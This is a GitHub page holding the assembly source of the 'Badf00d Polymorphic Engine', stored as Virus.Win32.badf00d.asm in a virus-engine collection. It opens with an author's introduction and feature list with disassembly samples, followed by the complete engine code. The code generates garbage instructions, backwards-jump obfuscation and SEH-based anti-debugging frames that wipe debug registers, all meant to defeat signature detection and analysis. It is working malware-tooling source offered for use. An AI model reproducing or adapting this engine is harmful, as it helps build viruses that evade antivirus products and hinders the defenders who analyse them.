forked from fcccode/Vx-Engines
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathVirus.Win32.badf00d.asm
990 lines (815 loc) · 24.4 KB
/
Virus.Win32.badf00d.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
comment $
\`. |\
\`-. \ `.| \!,,
\ \ `.\ _ (__
_ `-.> \ ___ \ __ ------------------------------------------
`-/,o-./O `. ._` Badf00d Polymorphic Engine
-// j_ | `` _<` ------------------------------------------
|\__( \--' ' \ . by Piotr Bania <bania.piotr@gmail.com>
> _ `--' _/ ; http://pb.specialised.info
| / `----.. . / (
| ( `. Y )
\ \ ,-.-.| |_ (_
`.`.___\ \ \/=.`. __) a little bit of this,
`--,==\ )==\,\ (_ a little bit of that
,'\===`--'====\,\ `-.
,'.` ============\,\ (`-'
/`=.`Y=============\,\ .'
/`-. `|==============\_,-._
/`-._`=|=___=========,'^, c-)
\`-----+' ._)=====_(_`-' ^-'`-.
-----`=====, \ `.-==(^_ ^c_,.^ `^_\-----
(__/`--'('(_,-._)-._,-.,__)`) hjw
`-._`._______.'_.-'
`---------'
Disclaimer__________________________________________________________________________________]
Author takes no responsibility for any actions with provided informations or codes.
The copyright for any material created by the author is reserved. Any duplication of
codes or texts provided here in electronic or printed publications is not permitted
without the author's agreement. If you disagree - leave now!
Introduction________________________________________________________________________________]
I must confess i was pretty bored and that's why i have written this engine. Meanwhile
i was also thinking about some PE encrypter, so sooner or later i got to produce some
poly engine for it. This little thingie was written in 2 days (few hours each day).
Current version is super beta, drop me an mail if you will find any errors.
Features____________________________________________________________________________________]
+ SEH frames generator (int3/sti/cli exceptions, BPM removers (dr0-3 cleaners), random
registry usage, random size of garbage block (return address is calculated via size
of the generated junks), generated SEH block looks like this:
* SNIP *
00402814 E8 3D000000 CALL pol.00402856
00402819 8BD4 MOV EDX,ESP ; generated REG
0040281B 81C2 0C000000 ADD EDX,0C
00402821 8B12 MOV EDX,DWORD PTR DS:[EDX]
00402823 C782 04000000 00>MOV DWORD PTR DS:[EDX+4],0
0040282D C782 08000000 00>MOV DWORD PTR DS:[EDX+8],0
00402837 C782 12000000 00>MOV DWORD PTR DS:[EDX+12],0
00402841 C782 16000000 00>MOV DWORD PTR DS:[EDX+16],0
0040284B 8182 B8000000 05>ADD DWORD PTR DS:[EDX+B8],5 ; calcs return addr
00402855 C3 RETN
00402856 33C9 XOR ECX,ECX
00402858 64:FF31 PUSH DWORD PTR FS:[ECX]
0040285B 64:8921 MOV DWORD PTR FS:[ECX],ESP
0040285E CC INT3
0040285F AF SCAS DWORD PTR ES:[EDI]
00402860 C8 50C933 ENTER 0C950,33
00402864 C0648F 00 5A SHL BYTE PTR DS:[EDI+ECX*4],5A
* SNIP *
As you can see doing only regswaping is not a good solution (still signature can be
generated - look RegSwap virus description), prolly it is better to mix randomly SEH
instructions with garbage. Use your imagination.
+ safe garbage generator (generates stepable garbage code, moreover user can specyfi
what registers should be used and what should be not, this feature gives an
advantage to mix original code together with garbage code, without destroying the
values from orginal one), like this snipet shows:
* SNIP - ALL REGS ALLOWED *
00402814 F7D2 NOT EDX
00402816 D1D3 RCL EBX,1
00402818 9B WAIT
00402819 9B WAIT
0040281A D1F9 SAR ECX,1
0040281C 93 XCHG EAX,EBX
0040281D 81C3 B9B1F0A8 ADD EBX,A8F0B1B9
00402823 F9 STC
00402824 81EF 73D13C4E SUB EDI,4E3CD173
0040282A 3BC7 CMP EAX,EDI
0040282C FD STD
0040282D 2BC6 SUB EAX,ESI
0040282F 57 PUSH EDI
00402830 81C9 6FA7215F OR ECX,5F21A76F
00402836 33F3 XOR ESI,EBX
00402838 F7D8 NEG EAX
0040283A 1BCE SBB ECX,ESI
* SNIP - ALL REGS ALLOWED *
* SNIP - ALLOWED EAX/EBX *
00402814 F7DB NEG EBX
00402816 F7D0 NOT EAX
00402818 85C3 TEST EBX,EAX
0040281A F8 CLC
0040281B 90 NOP
0040281C C7C3 BB153882 MOV EBX,823815BB
00402822 F7D8 NEG EAX
00402824 09DB OR EBX,EBX
00402826 D1D3 RCL EBX,1
00402828 D1D8 RCR EAX,1
0040282A EB 00 JMP SHORT pol.0040282C
0040282C 81EB 011DAF21 SUB EBX,21AF1D01
00402832 81E8 3BB25C3B SUB EAX,3B5CB23B
00402838 F8 CLC
* SNIP - ALLOWED EAX/EBX *
+ hardcore garbage generator (generates jmp over_garbage and generates garbage stepable
or totaly randomized - this one will be never executed), like here:
* SNIP - SOME GARBAGE CODE *
00402810 EB 14 JMP SHORT pol.00402826
00402812 CB RETF
00402813 69A0 1C1E85D1 F9>IMUL ESP,DWORD PTR DS:[EAX+D1851E1C],886>
0040281D F2: PREFIX REPNE:
0040281E 4B DEC EBX
0040281F 85FF TEST EDI,EDI
00402821 198A 797CF6EB SBB DWORD PTR DS:[EDX+EBF67C79],ECX
00402827 0C C8 OR AL,0C8
* SNIP - SOME GARBAGE CODE *
+ backwards jumps generator (generates some funny jumps :))
* SNIP *
0040280C EB 3A JMP SHORT pol.00402848
0040280E 33FE XOR EDI,ESI
00402810 EB 3B JMP SHORT pol.0040284D
00402812 AE SCAS BYTE PTR ES:[EDI]
00402813 ^73 C8 JNB SHORT pol.004027DD
00402815 71 13 JNO SHORT pol.0040282A
00402817 90 NOP
00402818 5E POP ESI
00402819 C2 AFE0 RETN 0E0AF
0040281C BB 8406103D MOV EBX,3D100684
00402821 60 PUSHAD
00402822 E5 77 IN EAX,77
00402824 2AC4 SUB AL,AH
00402826 59 POP ECX
00402827 3E:5C POP ESP
00402829 0E PUSH CS
0040282A 67:73 7A JNB SHORT pol.004028A7
0040282D AF SCAS DWORD PTR ES:[EDI]
0040282E 27 DAA
0040282F 0880 3B2E3EF3 OR BYTE PTR DS:[EAX+F33E2E3B],AL
00402835 5D POP EBP
00402836 52 PUSH EDX
00402837 D9FB FSINCOS
00402839 ^E1 BD LOOPDE SHORT pol.004027F8
0040283B 4E DEC ESI
0040283C 53 PUSH EBX
0040283D 4D DEC EBP
0040283E 62D6 BOUND EDX,ESI
00402840 A7 CMPS DWORD PTR DS:[ESI],DWORD PTR ES:[ED>
00402841 FF49 8C DEC DWORD PTR DS:[ECX-74]
00402844 07 POP ES
00402845 56 PUSH ESI
00402846 7A 15 JPE SHORT pol.0040285D
00402848 9B WAIT
00402849 ^EB C5 JMP SHORT pol.00402810
0040284B 6E OUTS DX,BYTE PTR ES:[EDI]
0040284C 45 INC EBP
* SNIP *
TODO________________________________________________________________________________________]
+ code some multiple decryption routines (xlat/xor/etc. etc - backwards/forwards)
+ add some checksum checker routines
+ code new engine :))
Sample_usage________________________________________________________________________________]
* SNIP *
call random_setup ; set seed
mov ecx,30 ; loop counter
lea edi,temp_buff ; EDI = where to store
gen_it:
mov eax,3
call random_eax ; give random
cmp eax,0
je skip_jmp
cmp eax,1
je skip_sehs
call t_normalize_pops ; normalize stack before SEHs
add edi,eax
call gen_seh ; generate SEHs
add edi,eax ; add edi,generated_code_size
skip_sehs:
call gen_bjumps ; generate backwards jumps
add edi,eax ; add edi,generated_code_size
skip_jmp:
mov eax,2
call random_eax ; give random
test eax,eax
jnz gen_it2
call gen_garbage_i ; generate some stepable junk
jmp loopers
gen_it2:
call hardcode_garbage_i ; generate some hard junks
loopers:
add edi,eax ; add edi,generated_code_size
loop gen_it
call t_normalize_pops ; normalize stack if it wasn't
add edi,eax ; normalized
* SNIP *
Have phun,
Piotr Bania
$
M0_EAX equ 0
M0_ECX equ 1
M0_EDX equ 2
M0_EBX equ 3
M0_ESI equ 4
M0_EDI equ 5
M1_EAX equ 0
M1_ECX equ 1
M1_EDX equ 2
M1_EBX equ 3
M1_ESI equ 6
M1_EDI equ 7
M2_EAX equ 0 shl 3
M2_ECX equ 1 shl 3
M2_EDX equ 2 shl 3
M2_EBX equ 3 shl 3
M2_ESI equ 6 shl 3
M2_EDI equ 7 shl 3
; -------------- MAIN REGISTERS TABLES ----------------------------------------
x1_table: db M1_EAX
db M1_ECX
db M1_EDX
db M1_EBX
db M1_ESI
db M1_EDI
x1_tbl_size = $ - offset x1_table
x2_table: db M2_EAX
db M2_ECX
db M2_EDX
db M2_EBX
db M2_ESI
db M2_EDI
x2_tbl_size = $ - offset x2_table
; -------------- INSTRUCTION TABLES -------------------------------------------
; FORMAT: (1 BYTE) (BYTE) (BYTE) (BYTE)
; <OPCODE> <MODRM> <LEN> <CSET>
;
; if there is no MODRM, MODRM must be set to 2Dh (temp)
NO_M equ 02dh
C_NONE equ 0
C_SRC equ 1
C_DST equ 2
C_BOTH equ 3
allowed_regs: db M0_EAX, M0_ECX, M0_EDX, M0_EBX, M0_ESI, M0_EDI
instr_table: db 0f9h, NO_M, 1h, C_NONE ; stc
db 0EBh, NO_M, 2h, C_NONE ; jmp $+1
db 0c7h, 0c0h, 6h, C_SRC ; mov reg(EAX),NUM
db 08bh, 0c0h, 2h, C_BOTH ; mov reg(EAX),reg(EAX)
db 081h, 0c0h, 6h, C_SRC ; add reg(EAX),NUM
db 003h, 0c0h, 2h, C_BOTH ; add reg(EAX),reg(EAX)
db 081h, 0e8h, 6h, C_SRC ; sub reg(EAX),NUM
db 02bh, 0c0h, 2h, C_BOTH ; sub reg(EAX),reg(EAX)
db 040h, NO_M, 1h, C_SRC ; inc reg(EAX)
db 048h, NO_M, 1h, C_SRC ; dec reg(EAX)
_i_xor_r db 033h, 0c0h, 2h, C_BOTH ; xor reg(EAX),reg(EAX)
db 009h, 0c0h, 2h, C_BOTH ; or reg(EAX),reg(EAX)
db 081h, 0c8h, 6h, C_SRC ; or reg(EAX),NUM
db 03bh, 0c0h, 2h, C_BOTH
db 085h, 0c0h, 2h, C_BOTH
db 01bh, 0c0h, 2h, C_BOTH ; sbb reg(EAX),reg(EAX)
db 011h, 0c0h, 2h, C_BOTH ; adc reg(EAX),reg(EAX)
db 0f7h, 0d0h, 2h, C_SRC ; not reg(EAX)
db 0f7h, 0d8h, 2h, C_SRC ; neg reg(EAX)
db 0d1h, 0f8h, 2h, C_SRC ; sar reg(EAX),1
db 0d1h, 0d8h, 2h, C_SRC ; rcr reg(EAX),1
db 0d1h, 0d0h, 2h, C_SRC ; rcl reg(EAX),1
db 091h, NO_M, 1h, C_SRC ; xchg reg(EAX),reg(ECX)
db 090h, NO_M, 1h, C_NONE ; nop
db 0fch, NO_M, 1h, C_NONE ; cld
db 0f8h, NO_M, 1h, C_NONE ; clc
db 0fdh, NO_M, 1h, C_NONE ; std
db 09bh, NO_M, 1h, C_NONE ; wait
db 050h, NO_M, 1h, C_SRC ; push reg(eax)
_i_pop db 058h, NO_M, 1h, C_SRC ; pop reg(eax) (must be last one)
ENTRY_TABLE_SIZE = 4
instr_table_size = (($-offset instr_table)/4)
dd 0
push_number dd 0
do_push db 1 ; should we process pushs?
O_JMP equ 0EBh
O_PUSH equ 050h
O_POP equ 058h
i_jmp: db 0EBh, NO_M, 2h ; jmp $+1
; -------------- GARBAGE GENERATOR (SAFE) ------------------------------------
; EDI = where
; ----------------------------------------------------------------------------
gen_garbage_i:
pushad
garbage_again:
mov eax,instr_table_size
call random_eax
lea esi,instr_table
mov ecx,ENTRY_TABLE_SIZE
mul ecx ; eax=member from table to use
add esi,eax
jmp garbage_co
garbage_hand: pushad
garbage_co: lodsw ; ah = modrm value / al=opcode
cmp ah,NO_M
je no_modrm
stosb ; store opcode
xor edx,edx
mov dl,ah
cmp byte ptr [esi+1],C_BOTH ; what registers to mutate
je p_01
cmp byte ptr [esi+1],C_SRC
jne t_01
p_01: and dl,0F8h
mov eax,x1_tbl_size
call random_eax
mov al,byte ptr [allowed_regs[eax]]
mov al,byte ptr [x1_table[eax]]
or dl,al
mov byte ptr [edi],dl
t_01: cmp byte ptr [esi+1],C_BOTH ; what registers to mutate
je p_02
cmp byte ptr [esi+1],C_DST
jne finish_i
p_02: and dl,0C7h
mov eax,x2_tbl_size
call random_eax
mov al,byte ptr [allowed_regs[eax]]
mov al,byte ptr [x2_table[eax]]
or dl,al ; update modrm value
mov byte ptr [edi],dl
finish_i: mov cl,byte ptr [esi]
sub cl,2
inc edi
cmp cl,0
jle garbage_done
store_op: mov eax,12345678h
call random_eax
stosb
loop store_op
garbage_done: xor eax,eax
mov al,byte ptr [esi]
mov [esp+PUSHA_STRUCT._EAX],eax
popad
ret
; ----------------------------------------------------
; NO MOD-RMs
; ----------------------------------------------------
no_modrm: xor edx,edx
mov dl,al
cmp byte ptr [esi+1],C_NONE
je t_none
cmp dl,O_PUSH
je t_push
cmp dl,O_POP
je t_pop
go_nomodrm: mov eax,x1_tbl_size
call random_eax
mov al,byte ptr [allowed_regs[eax]]
mov al,byte ptr [x1_table[eax]]
and dl,0F8h
or dl,al
mov byte ptr [edi],dl
inc edi
jmp finish_i
t_none: mov byte ptr [edi],dl
inc edi
cmp dl,O_JMP
jne finish_i
mov byte ptr [edi],0
inc edi
jmp finish_i
t_push: cmp byte ptr [do_push],1
jne garbage_again
inc dword ptr [push_number]
jmp go_nomodrm
t_pop: cmp byte ptr [do_push],1
jne garbage_again
cmp dword ptr [push_number],0
jle garbage_again
dec dword ptr [push_number]
jmp go_nomodrm
t_normalize_pops:
pushad
xor ebx,ebx
mov ecx,dword ptr [push_number]
test ecx,ecx
jz t_opsexit
t_givepops: lea esi,_i_pop
call garbage_hand
add edi,eax
add ebx,eax
loop t_givepops
t_opsexit: mov [esp+PUSHA_STRUCT._EAX],ebx
popad
ret
; ---------------------------------------------------------------------------
; HARDCORE GARBAGER
; ---------------------------------------------------------------------------
; EDI = where to store
;
; This one generates code like this:
; jmp over_garbage
; <totaly random generated garbage>
; <normal garbage>
; max: up to 20 "instructions"
; ---------------------------------------------------------------------------
hardcode_garbage_i:
pushad
mov ebx,edi
lea edi,hardcore_temp
mov eax,20
call random_eax
mov ecx,eax
add ecx,4
h_fill: mov eax,2
call random_eax
test eax,eax
jnz h_hard
call gen_garbage_i
jmp h_cont
h_hard: mov eax,5
call random_eax
mov edx,eax
inc edx
xor esi,esi
h_hard_fill: mov eax,0FFFFh
call random_eax
stosb
inc esi
dec edx
jnz h_hard_fill
loop h_fill
jmp h_done
h_cont: add edi,eax
loop h_fill
h_done: lea ecx,hardcore_temp
sub edi,ecx
mov ecx,edi
mov byte ptr [ebx],O_JMP
inc ebx
mov byte ptr [ebx],cl
inc ebx
push ecx
mov edi,ebx
lea esi,hardcore_temp
rep movsb
pop eax
add eax,2
mov [esp+PUSHA_STRUCT._EAX],eax
popad
ret
; -------------------------------------------------------------
; Generates backwards jumps
; -------------------------------------------------------------
; EDI = buffor
gen_bjumps:
pushad
mov ebx,edi
mov byte ptr [jmp_flag],0
mov byte ptr [jmp_flag_b],0
mov dword ptr [count_jmp],0
mov dword ptr [where_where],0
mov dword ptr [jmp_bytes],0
mov byte ptr [do_push],0
mov byte ptr [where_losed],0
mov byte ptr [ebx],O_JMP
mov dword ptr [where_start],ebx
add dword ptr [where_start],2
inc ebx
xor esi,esi
add edi,2
add dword ptr [jmp_bytes],2
gen_gar_i: mov eax,20
call random_eax
mov ecx,eax
add ecx,10
gen_gar_ii: call gen_garbage_i
add dword ptr [jmp_bytes],eax
add esi,eax
add edi,eax
cmp byte ptr [jmp_flag],1
jne gen_gari_ix
add dword ptr [count_jmp],eax
jmp gen_gari_ixx
gen_gari_ix: push eax
mov eax,2
call random_eax
mov edx,eax
pop eax
cmp byte ptr [where_losed],1
je gen_gari_ixx
add dword ptr [where_start],eax
cmp edx,1
je gen_gari_ixx
mov byte ptr [where_losed],1
gen_gari_ixx: mov eax,3
call random_eax
cmp eax,2
jne cont_gari
cmp byte ptr [jmp_flag],1
je cont_gari
mov byte ptr [jmp_flag],1
mov byte ptr [edi],O_JMP
inc edi
mov dword ptr [where_jmp],edi
inc edi
add esi,2
cont_gari: loop gen_gar_ii
mov eax,esi
mov byte ptr [ebx],al
cmp byte ptr [jmp_flag],1
je cont_gari2
mov byte ptr [edi],O_JMP
inc edi
mov dword ptr [where_jmp],edi
inc edi
cont_gari2: mov dword ptr [where_where],edi
add dword ptr [jmp_bytes],2
mov eax,5
call random_eax
inc eax
mov ecx,eax
cont_gari3: call gen_garbage_i
add dword ptr [jmp_bytes],eax
add edi,eax
add dword ptr [count_jmp],eax
loop cont_gari3
mov byte ptr [edi],O_JMP
mov eax,edi
sub eax,dword ptr [where_start]
add eax,2
neg eax
pushad
add edi,2
mov eax,4
call random_eax
mov ecx,eax
test ecx,ecx
jz cont_gari4
place_gar: mov eax,0FFh
call random_eax
inc dword ptr [count_jmp]
inc dword ptr [jmp_bytes]
stosb
loop place_gar
cont_gari4: add dword ptr [count_jmp],2
mov eax,dword ptr [count_jmp]
mov edx,dword ptr [where_jmp]
mov byte ptr [edx],al
popad
mov byte ptr [edi+1],al
add dword ptr [jmp_bytes],2
mov edx,dword ptr [where_where]
sub edx,dword ptr [where_jmp]
dec edx
mov ecx,edx
mov edx,dword ptr [where_jmp]
inc edx
cmp ecx,0
jle cont_no_xor
cont_xor: mov eax,0FFh
call random_eax
xor byte ptr [edx],al
inc edx
loop cont_xor
cont_no_xor: mov byte ptr [do_push],1
mov edx,dword ptr [jmp_bytes]
mov [esp+PUSHA_STRUCT._EAX],edx
popad
ret
jmp_bytes dd 0
where_losed db 0
where_where dd 0
where_start dd 0
count_jmp dd 0
where_jmp dd 0
jmp_flag db 0
jmp_flag_b db 0
; -------------------------------------------------------------
; Generates SEH frames/exceptions/etc.
; -------------------------------------------------------------
; EDI = buffor
FS_PREFIX equ 064h
seh_push_fs db 0ffh, 030h, 2h, C_SRC
seh_mov_fs db 089h, 020h, 2h, C_SRC
seh_pop_fs db 08fh, 000h, 2h, C_SRC
_mov_reg_esp db 08bh, 0c4h, 2h, C_DST ; mov reg,ESP
_add_reg_num db 081h, 0c0h, 2h, C_SRC ; add reg,NUM (we must typo NUM by hand: 4) LEN=6
_mov_reg_oreg db 08bh, 000h, 2h, C_BOTH ; mov reg,[REG]
_mov_dreg_num db 0c7h, 080h, 2h, C_SRC ; mov [reg+NUM],0 (add NUM by hand) LEN: A
_add_dreg_num db 081h, 080h, 2h, C_SRC
exception_table:
db 0CCh ; int 3
db 0fah ; cli
db 0fbh ; sti
exception_table_size = $-offset exception_table
gen_seh:
pushad
xor edx,edx
mov ebx,edi
mov byte ptr [edi],0E8h
mov dword ptr [edi+1],0
add edx,5
add edi,5
push edi
lea esi,allowed_regs
mov ecx,x1_tbl_size
push esi
push ecx
lea edi,allowed_regs_temp
rep movsb
pop ecx
pop edi
pushad
mov eax,x1_tbl_size
call random_eax
cmp eax,M0_EAX
jne reg_p
inc eax ; somehow :) EAX usage results with invalid disposition error
reg_p: rep stosb
mov edi,[esp+PUSHA_STRUCT_SIZE]
lea esi,_mov_reg_esp
call garbage_hand
add dword ptr [esp+PUSHA_STRUCT._EDX],eax
add [esp+PUSHA_STRUCT_SIZE],eax
add edi,eax
lea esi,_add_reg_num
call garbage_hand
add edi,2
mov dword ptr [edi],0Ch
add dword ptr [esp+PUSHA_STRUCT._EDX],6
add [esp+PUSHA_STRUCT_SIZE],6
add edi,4
lea esi,_mov_reg_oreg
call garbage_hand
add dword ptr [esp+PUSHA_STRUCT._EDX],eax
add [esp+PUSHA_STRUCT_SIZE],eax
add edi,eax
lea esi,_mov_dreg_num
call garbage_hand
add dword ptr [esp+PUSHA_STRUCT._EDX],0ah
add [esp+PUSHA_STRUCT_SIZE],0ah
add edi,2
mov dword ptr [edi],04h
mov dword ptr [edi+4],0h
add edi,0ah-2
lea esi,_mov_dreg_num
call garbage_hand
add dword ptr [esp+PUSHA_STRUCT._EDX],0ah
add [esp+PUSHA_STRUCT_SIZE],0ah
add edi,2
mov dword ptr [edi],08h
mov dword ptr [edi+4],0h
add edi,0ah-2
lea esi,_mov_dreg_num
call garbage_hand
add dword ptr [esp+PUSHA_STRUCT._EDX],0ah
add [esp+PUSHA_STRUCT_SIZE],0ah
add edi,2
mov dword ptr [edi],12h
mov dword ptr [edi+4],0h
add edi,0ah-2
lea esi,_mov_dreg_num
call garbage_hand
add dword ptr [esp+PUSHA_STRUCT._EDX],0ah
add [esp+PUSHA_STRUCT_SIZE],0ah
add edi,2
mov dword ptr [edi],16h
mov dword ptr [edi+4],0h
add edi,0ah-2
lea esi,_add_dreg_num
call garbage_hand
add dword ptr [esp+PUSHA_STRUCT._EDX],0ah+1
add [esp+PUSHA_STRUCT_SIZE],0ah+1
add edi,2
mov dword ptr [edi],0b8h
add edi,4
mov dword ptr [where_over],edi
add edi,0ah-6
mov byte ptr [edi],0C3h ; ret
inc edi
popad
mov byte ptr [ebx+1],dl
sub byte ptr [ebx+1],5
mov eax,x1_tbl_size
call random_eax
rep stosb
pop edi
lea esi,_i_xor_r
call garbage_hand
add edi,eax
add edx,eax
mov byte ptr [edi],FS_PREFIX
inc edi
inc edx
lea esi,seh_push_fs
call garbage_hand
add edi,eax
add edx,eax
mov byte ptr [edi],FS_PREFIX
inc edi
inc edx
lea esi,seh_mov_fs
call garbage_hand
add edi,eax
add edx,eax
call reset_regs
xor ebx,ebx
mov eax,exception_table_size
call random_eax
mov cl,byte ptr exception_table[eax]
mov byte ptr [edi],cl
inc edx
inc edi
inc ebx
call fill_trash
add edx,eax
add ebx,eax
add edi,eax
push edi
mov edi,dword ptr [where_over]
mov dword ptr [edi],ebx
pop edi
call finalize_seh
add edx,eax
mov [esp+PUSHA_STRUCT._EAX],edx
popad
ret
where_over dd 0
allowed_regs_temp db x1_tbl_size dup (0)
finalize_seh:
pushad
call gen_regs
xor edx,edx
lea esi,_i_xor_r
call garbage_hand
add edi,eax
add edx,eax
mov byte ptr [edi],FS_PREFIX
inc edi
inc edx
lea esi,seh_pop_fs
call garbage_hand
add edi,eax
add edx,eax
call reset_regs
inc dword ptr [push_number]
lea esi,_i_pop
call garbage_hand
add edx,eax
add edi,eax
mov [esp+PUSHA_STRUCT._EAX],edx
popad
ret
fill_trash: pushad
xor ebx,ebx
mov eax,20
call random_eax
mov ecx,eax
test eax,eax
jz done_fill_trash
fill_trash_x: mov eax,0FFh
call random_eax
stosb
inc ebx
loop fill_trash_x
done_fill_trash:
mov [esp+PUSHA_STRUCT._EAX],ebx
popad
ret
reset_regs:
pushad
lea esi,allowed_regs_temp
mov ecx,x1_tbl_size
lea edi,allowed_regs
rep movsb
popad
ret
gen_regs: pushad
mov eax,x1_tbl_size
call random_eax
lea edi,allowed_regs
mov ecx,x1_tbl_size
rep stosb
popad
ret
set_random: pushad
mov eax,6
call random_eax
cmp eax,5
jne not_set
call gen_bjumps
jmp le_set
not_set: xor eax,eax
le_set: mov [esp+PUSHA_STRUCT._EAX],eax
popad
ret
random_setup proc
@callx GetTickCount
mov Random_Seed,eax
ret
random_setup endp
Random_Seed dd 0
random_eax proc
PUSH ECX
PUSH EDX
PUSH EAX
db 0Fh, 31h ; RDTSC
MOV ECX, Random_Seed
ADD EAX, ECX
ROL ECX, 1
ADD ECX, 666h
MOV Random_Seed, ECX
PUSH 32
POP ECX
CRC_Bit: SHR EAX, 1
JNC Loop_CRC_Bit
XOR EAX, 0EDB88320h
Loop_CRC_Bit: LOOP CRC_Bit
POP ECX
XOR EDX, EDX
DIV ECX
XCHG EDX, EAX
OR EAX, EAX
POP EDX
POP ECX
RETN
random_eax endp